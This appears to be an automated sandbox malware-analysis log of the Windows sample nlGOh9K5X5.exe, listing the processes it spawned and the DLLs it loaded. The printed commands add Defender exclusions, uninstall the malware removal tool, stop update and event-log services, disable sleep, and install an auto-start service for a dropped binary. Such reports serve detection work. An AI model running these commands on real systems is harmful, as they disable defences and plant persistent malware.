                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: nlGOh9K5X5.exeReversingLabs: Detection: 73%
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeFile read: C:\Users\user\Desktop\nlGOh9K5X5.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\nlGOh9K5X5.exe "C:\Users\user\Desktop\nlGOh9K5X5.exe"
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "HZIWFEGQ"
                  Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "HZIWFEGQ" binpath= "C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe" start= "auto"
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "HZIWFEGQ"
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\explorer.exe explorer.exe
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "HZIWFEGQ"Jump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "HZIWFEGQ" binpath= "C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe" start= "auto"Jump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "HZIWFEGQ"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
                  Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
                  Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
